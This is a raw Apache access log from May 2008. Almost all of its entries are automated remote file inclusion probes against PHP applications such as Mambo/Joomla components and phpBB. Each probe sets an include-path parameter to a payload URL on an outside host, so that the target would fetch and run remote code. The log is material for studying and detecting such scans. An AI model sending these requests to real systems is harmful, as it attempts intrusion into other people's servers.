208.116.44.60 - - [03/May/2008:11:57:15 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.116.44.60 - - [03/May/2008:11:57:15 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.116.44.60 - - [03/May/2008:11:57:15 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.116.44.60 - - [03/May/2008:11:57:15 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.116.44.60 - - [03/May/2008:11:57:15 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.116.44.60 - - [03/May/2008:11:57:15 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.116.44.60 - - [03/May/2008:11:57:15 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.116.44.60 - - [03/May/2008:11:57:16 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.116.44.60 - - [03/May/2008:11:57:15 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.246.61.4 - - [03/May/2008:11:57:21 -0700] "GET /logs/access.log//administrator/components/com_jjgallery/admin.jjgallery.php?=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [03/May/2008:11:57:22 -0700] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [03/May/2008:11:57:22 -0700] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.202.88.113 - - [03/May/2008:11:57:47 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
193.202.88.113 - - [03/May/2008:11:57:47 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
193.202.88.113 - - [03/May/2008:11:57:48 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
193.202.88.113 - - [03/May/2008:11:57:48 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
193.202.88.113 - - [03/May/2008:11:57:48 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
193.202.88.113 - - [03/May/2008:11:57:48 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
193.202.88.113 - - [03/May/2008:11:57:50 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
193.202.88.113 - - [03/May/2008:11:57:51 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
193.202.88.113 - - [03/May/2008:11:57:51 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:11:58:00 -0700] "GET /logs/access_080215.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:11:58:05 -0700] "GET /logs/access_080215.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
195.70.35.179 - - [03/May/2008:11:58:18 -0700] "GET /presto/ HTTP/1.1" 200 526 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.6) Gecko/20061201 Firefox/2.0.0.6 (Ubuntu-feisty)" "www.dmulk.com"
208.116.0.130 - - [03/May/2008:11:58:26 -0700] "GET /logs/access.log//index.php?body=http://www.sanctuary.ch/agenda/idsxa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.116.0.130 - - [03/May/2008:11:58:30 -0700] "GET //index.php?body=http://www.sanctuary.ch/agenda/idsxa.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.810" "www.dmulk.com"
208.116.0.130 - - [03/May/2008:11:58:31 -0700] "GET /logs//index.php?body=http://www.sanctuary.ch/agenda/idsxa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.100.1.157 - - [03/May/2008:11:58:51 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://h1.ripway.com/XdedzX1212/plugin/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.100.1.157 - - [03/May/2008:11:58:51 -0700] "GET //skin/zero_vote/error.php?dir=http://h1.ripway.com/XdedzX1212/plugin/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.100.1.157 - - [03/May/2008:11:58:51 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://h1.ripway.com/XdedzX1212/plugin/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.118.85.12 - - [03/May/2008:11:58:58 -0700] "GET /logs/access_071225.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ride2eat.com/calendar/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.118.85.12 - - [03/May/2008:11:58:58 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ride2eat.com/calendar/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.118.85.12 - - [03/May/2008:11:58:58 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ride2eat.com/calendar/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.118.85.12 - - [03/May/2008:11:58:59 -0700] "GET /logs/access_071225.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ride2eat.com/calendar/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.118.85.12 - - [03/May/2008:11:58:59 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ride2eat.com/calendar/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.100.1.157 - - [03/May/2008:11:59:00 -0700] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://h1.ripway.com/XdedzX1212/plugin/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.116.44.60 - - [03/May/2008:11:59:00 -0700] "GET /logs/access_080308.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.118.85.12 - - [03/May/2008:11:59:00 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ride2eat.com/calendar/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
77.221.130.3 - - [03/May/2008:11:59:01 -0700] "GET /logs/language/lang_english/lang_main_album.php?phpbb_root_path=http://finkel.fileave.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.3 - - [03/May/2008:11:59:01 -0700] "GET /language/lang_english/lang_main_album.php?phpbb_root_path=http://finkel.fileave.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.116.44.60 - - [03/May/2008:11:59:03 -0700] "GET /logs/access_080308.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.116.44.60 - - [03/May/2008:11:59:04 -0700] "GET /logs/access_080308.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.116.0.130 - - [03/May/2008:11:59:05 -0700] "GET /logs/access_080223.log//index.php?body=http://www.sanctuary.ch/agenda/idsxa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
193.202.88.113 - - [03/May/2008:11:59:29 -0700] "GET /logs/access_080308.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
193.202.88.113 - - [03/May/2008:11:59:29 -0700] "GET /logs/access_080308.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
193.202.88.113 - - [03/May/2008:11:59:29 -0700] "GET /logs/access_080308.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.253.162.6 - - [03/May/2008:12:00:01 -0700] "GET /logs/access.log//index.php?body=http://www.freebirdradio.com/hiro/sql/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.253.162.6 - - [03/May/2008:12:00:07 -0700] "GET /logs//index.php?body=http://www.freebirdradio.com/hiro/sql/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.253.162.6 - - [03/May/2008:12:00:07 -0700] "GET //index.php?body=http://www.freebirdradio.com/hiro/sql/safeon.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.808" "www.dmulk.com"
165.228.215.195 - - [03/May/2008:12:00:25 -0700] "GET /logs/access_080121.log/send_reminders.php?includedir=http://www.ride2eat.com/calendar/albo/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
165.228.215.195 - - [03/May/2008:12:00:26 -0700] "GET /send_reminders.php?includedir=http://www.ride2eat.com/calendar/albo/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
165.228.215.195 - - [03/May/2008:12:00:28 -0700] "GET /logs/send_reminders.php?includedir=http://www.ride2eat.com/calendar/albo/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.246.61.4 - - [03/May/2008:12:00:32 -0700] "GET /logs/access_080220.log//administrator/components/com_jjgallery/admin.jjgallery.php?=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.208.68.157 - - [03/May/2008:12:00:46 -0700] "GET /logs//myspeach/jscript.php?my_ms[root]=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.68.157 - - [03/May/2008:12:00:46 -0700] "GET //myspeach/jscript.php?my_ms[root]=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.253.162.6 - - [03/May/2008:12:00:50 -0700] "GET /logs/access_080223.log//index.php?body=http://www.freebirdradio.com/hiro/sql/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.195.58.163 - - [03/May/2008:12:00:53 -0700] "GET / HTTP/1.0" 200 11590 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
217.168.112.1 - - [03/May/2008:12:01:22 -0700] "GET /logs/access.log/index.php?sayfa=http://areairc.t35.com/super/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.168.112.1 - - [03/May/2008:12:01:26 -0700] "GET /index.php?sayfa=http://areairc.t35.com/super/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.810" "www.dmulk.com"
217.168.112.1 - - [03/May/2008:12:01:28 -0700] "GET /logs/index.php?sayfa=http://areairc.t35.com/super/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
165.228.215.195 - - [03/May/2008:12:01:36 -0700] "GET /logs/access_080104.log/send_reminders.php?includedir=http://www.ride2eat.com/calendar/albo/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.246.61.4 - - [03/May/2008:12:01:37 -0700] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [03/May/2008:12:01:37 -0700] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.203.209.2 - - [03/May/2008:12:01:52 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.209.2 - - [03/May/2008:12:01:52 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.209.2 - - [03/May/2008:12:01:52 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.165.216.146 - - [03/May/2008:12:02:18 -0700] "GET /logs/access_080313.log/components/com_forum/download.php?phpbb_root_path=http://finkel.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
68.165.216.146 - - [03/May/2008:12:02:18 -0700] "GET /components/com_forum/download.php?phpbb_root_path=http://finkel.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
68.165.216.146 - - [03/May/2008:12:02:19 -0700] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://finkel.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.30.249.131 - - [03/May/2008:12:02:51 -0700] "GET /index.php?option=com_user&task=&Itemid=&mosConfig_absolute_path=http://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.0" 200 11590 "-" "libwww-perl/5.65" "www.dmulk.com"
165.228.215.195 - - [03/May/2008:12:02:56 -0700] "GET /logs/send_reminders.php?includedir=http://www.ride2eat.com/calendar/albo/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
165.228.215.195 - - [03/May/2008:12:02:57 -0700] "GET /send_reminders.php?includedir=http://www.ride2eat.com/calendar/albo/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:12:02:58 -0700] "GET /logs/access_080324.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:12:02:58 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:12:02:58 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:12:03:09 -0700] "GET /logs/access_080324.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:12:03:09 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:12:03:09 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:12:03:11 -0700] "GET /logs/access_080324.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:12:03:11 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:12:03:11 -0700] "GET /logs/access_080324.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:12:03:11 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:12:03:11 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:12:03:11 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:12:03:17 -0700] "GET /logs/access_080324.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:12:03:20 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:12:03:21 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
213.246.61.4 - - [03/May/2008:12:03:29 -0700] "GET /logs//status/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [03/May/2008:12:03:29 -0700] "GET //status/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.19.174.121 - - [03/May/2008:12:03:33 -0700] "GET /logs//include.php?path[docroot]=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.19.174.121 - - [03/May/2008:12:03:34 -0700] "GET //include.php?path[docroot]=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [03/May/2008:12:03:58 -0700] "GET /logs/access_080119.log//status/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [03/May/2008:12:03:58 -0700] "GET //status/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [03/May/2008:12:03:59 -0700] "GET /logs//status/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.253.162.6 - - [03/May/2008:12:04:05 -0700] "GET //index.php?body=http://www.freebirdradio.com/hiro/sql/safeon.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.808" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:12:04:22 -0700] "GET /logs/access_080127.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
193.51.215.1 - - [03/May/2008:12:04:23 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.51.215.1 - - [03/May/2008:12:04:23 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:12:04:37 -0700] "GET /logs/access_080127.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:12:04:38 -0700] "GET /logs/access_080127.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:12:04:38 -0700] "GET /logs/access_080127.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
216.227.217.6 - - [03/May/2008:12:04:40 -0700] "GET /logs/send_reminders.php?includedir=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.227.217.6 - - [03/May/2008:12:04:40 -0700] "GET /send_reminders.php?includedir=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.246.61.4 - - [03/May/2008:12:04:40 -0700] "GET /logs/access_080123.log//status/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.218.137.36 - - [03/May/2008:12:04:42 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.diabeteszones.com/media/.help/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.218.137.36 - - [03/May/2008:12:04:42 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.diabeteszones.com/media/.help/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.18.152.168 - - [03/May/2008:12:04:55 -0700] "GET //extensions/moblog/moblog_lib.php?basedir=http://thetestingcompany.com//cache/rotest.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
72.18.152.168 - - [03/May/2008:12:04:55 -0700] "GET /logs//extensions/moblog/moblog_lib.php?basedir=http://thetestingcompany.com//cache/rotest.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:12:04:55 -0700] "GET /logs/access_080127.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
74.208.68.157 - - [03/May/2008:12:04:56 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.68.157 - - [03/May/2008:12:04:57 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.165.216.146 - - [03/May/2008:12:05:04 -0700] "GET /logs/access_080126.log/components/com_forum/download.php?phpbb_root_path=http://finkel.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.58.131.61 - - [03/May/2008:12:05:13 -0700] "GET /!scanhttp://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
82.192.70.11 - - [03/May/2008:12:05:51 -0700] "GET /logs/access_071219.log//components/com_simpleboard/image_upload.php?sbp=http://www.diabeteszones.com/media/.help/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
82.192.70.11 - - [03/May/2008:12:05:51 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.diabeteszones.com/media/.help/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
82.192.70.11 - - [03/May/2008:12:05:52 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.diabeteszones.com/media/.help/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
86.71.73.40 - - [03/May/2008:12:06:01 -0700] "GET /logs/access.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Mozilla/4.0 compatible ZyBorg/1.0 (wn.zyborg@looksmart.net; http://www.WISEnutbot.com)" "www.dmulk.com"
213.203.209.2 - - [03/May/2008:12:06:03 -0700] "GET /logs/access_080308.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.192.70.11 - - [03/May/2008:12:06:21 -0700] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://www.diabeteszones.com/media/.help/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
189.22.150.131 - - [03/May/2008:12:06:44 -0700] "GET /logs/display.php?table=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
